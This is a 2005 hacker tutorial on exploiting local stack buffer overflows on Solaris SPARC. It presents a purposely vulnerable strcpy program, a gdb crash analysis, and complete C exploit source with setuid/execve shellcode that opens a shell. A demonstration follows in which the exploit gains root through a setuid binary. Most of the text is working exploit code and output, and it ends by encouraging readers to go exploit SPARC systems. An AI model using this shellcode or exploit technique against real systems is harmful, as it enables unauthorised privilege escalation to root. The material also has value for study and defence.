#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ Solaris SPARC: Writing Local Stack Overflows skew 04.28.05 #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ Table of Contents ================= 1. Introduction 2. Getting Started 2.1 The Vulnerable Program 2.2 Writing an Exploit 2.3 Testing 1-2-3 3. Links/References 4. Conclusion #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 1. The SPARC architecture is somewhat different than the x86 architecture that is so common around the workplace and at home. SPARC is actually based on the RISC architecture but by Sun Microsystems. Its used mainly as running servers or sometimes as workstations, and has gotten a fairly large number of fans that are dedicated and enjoy the workings of the system. Solaris, also by Sun Microsystems, is a operating system that was designed to run on SPARC, and now even x86. Writing exploits for local stack overflows on the x86 CPU may be fairly easy, but on the SPARC, it is as I said before different. Not necessarily *harder*, just a bit different. In this text I plan on giving a example of some insecure code, showing you how to write an exploit for it, and test it out. I do not attempt to explain the many virtues of understanding of the SPARC architecture, but I do recommend you check out the links/references section for some good guidance on learning more. #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 2. Getting started, you'll need a SPARC box with Solaris 8, 9, or 10 installed. Along with that, you'll also need GCC, GDB, a good text editor (vi, pico, nano, emacs, joe), and access to a shell on the box. Open up a shell prompt and get ready for section 2.1. #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 2.1 To show you how to write an exploit, you'll need something to practice with. I'll show you the example vulnerable program we will be exploiting in this text. -bash-3.00$ cat vuln.c void copy(char *a) { char buffer[512]; strcpy(buffer, a); } main(int argc, char *argv[]) { copy(argv[1]); } -bash-3.00$ As you can see, a vulnerable strcpy() call is called and data can be overflowed. Also note we are working on a default security Solaris 9 box, which does NOT have the non-executable stack feature on. Now, lets see what we can do with this program. -bash-3.00$ gcc -o vuln vuln.c -bash-3.00$ ./vuln test -bash-3.00$ Hmm.. seems to work fine so far. But, lets see if we can make it copy even more data, *possibly* making it overflow the string that the data is being copied into. -bash-3.00$ ./vuln `perl -e 'print "A" x 592'` Bus Error (core dumped) -bash-3.00$ Oh.. wow.. what happened? -bash-3.00$ gdb -c core GNU gdb 6.0 Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.9". Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 10, Bus error. #0 0x000106d8 in ?? () (gdb) i r g0 0x0 0 g1 0xef6f40f0 -277921552 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xeffffc73 -268436365 o1 0x4 4 o2 0x359c0 219584 o3 0xef7c3814 -277071852 o4 0xeffffff5 -268435467 o5 0xef7daff8 -276975624 sp 0xeffffad8 4026530520 o7 0x106c8 67272 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0xeffffc73 -268436365 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0x41414141 1094795585 i7 0x41414141 1094795585 --> =] y 0x0 0 psr 0x4400085 71303301 icc:-Z--, pil:0, s:1, ps:0, et:0, cwp:5 wim 0x0 0 tbr 0x0 0 pc 0x106d8 67288 npc 0x106dc 67292 fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0 cpsr 0x0 0 (gdb) If you didn't know, the register on the SPARC architecture that means "return address" is %i7. i7 0x41414141 1094795585 Now, as you can also see, 0x41414141 is the current return address for the program. 0x41 = A, and we put in 592 A's.. so we must have overflowed the buffer enough to overwrite the return address. Although it is good that we overwrote the return address, writing 0x41414141 in it doesn't do us much good, especially if we want a nice shell. So, to get a shell, we are going to have to overwrite the return address with the address that points to shellcode, not data such as "A" or etc. #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 2.2 Ok, its time to write an exploit. -bash-3.00$ cat ex.c #include #define BIN "/export/home/skew/vuln" #define SIZE 592 // buffer size + 80 = %i7 (retaddr) overwritten ;] static char sc[] = /* Solaris SPARC double setuid() + execve() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; static char nop[] = "\xac\x15\xa1\x6e"; /* SPARC NOP */ unsigned long get_sp(void) { __asm__("or %sp,%sp,%i0"); /* or *stack pointer*,*stack pointer*,*in* */ } main() { char buffer[SIZE], *ptr; int align, i; unsigned long retaddr, sp; retaddr = sp = get_sp(); if((align = retaddr % 4)) { retaddr &= ~(align); } memset(buffer, 0, SIZE); for(i = 0; i < SIZE; i += 4) { strcpy(&buffer[i], nop); } memcpy((buffer + SIZE - strlen(sc) - 8), sc, strlen(sc)); ptr = &buffer[SIZE-8]; /* set fp (frame pointer / %fp) to a save stack value */ *(ptr++) = (sp >> 24) & 0xff; *(ptr++) = (sp >> 16) & 0xff; *(ptr++) = (sp >> 8) & 0xff; *(ptr++) = (sp) & 0xff; /* overwrite saved PC */ *(ptr++) = (retaddr >> 24) & 0xff; *(ptr++) = (retaddr >> 16) & 0xff; *(ptr++) = (retaddr >> 8) & 0xff; *(ptr++) = (retaddr) & 0xff; buffer[SIZE - 1] = 0; printf("\nUsing retaddr: 0x%x\n\n", retaddr); execl(BIN, BIN, buffer, NULL); return 0; } -bash-3.00$ This exploit was written on Solaris 9 running on my Sun SPARCstation 5 with NO non-executable stack protection enabled. If your Solaris box has the non-executable enabled, then this exploit WILL NOT work. #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 2.3 Lets test the exploit now. -bash-3.00$ ls -al vuln -rwxr-xr-x 1 skew staff 6576 Apr 28 08:14 vuln -bash-3.00$ ./ex Using retaddr: 0xeffffa58 $ id uid=1001(skew) gid=10(staff) $ exit -bash-3.00$ su Password: # chown root:other vuln # chmod +s vuln # exit exit -bash-3.00$ ls -al vuln -rwsr-sr-x 1 root other 6576 Apr 28 08:14 vuln -bash-3.00$ ./ex Using retaddr: 0xeffffa58 # id uid=0(root) gid=10(staff) egid=1(other) # exit -bash-3.00$ Well, that worked out well, didn't it? Heh. #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 3. Here are some links and references that may help you. SPARC Overflows: http://www.emsi.it.pl/sploits/solaris/sparcoverflow.html SPARC Assembly: http://www.cs.clemson.edu/~mark/sparc_assembly.html Sun Solaris: http://www.sun.com/software/solaris #####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$#####$$$$$ 4. The conclusion on this text is that although exploiting the SPARC architecture is different than x86, that doesn't mean it is hard to do. As you seen in the text, its not as hard as some people like to put it. SPARC is quite exploitable, so take some time and knock yourself out ;). -skew (skewtty@charter.net / http://skewtty.dyndns.org) 04.28.05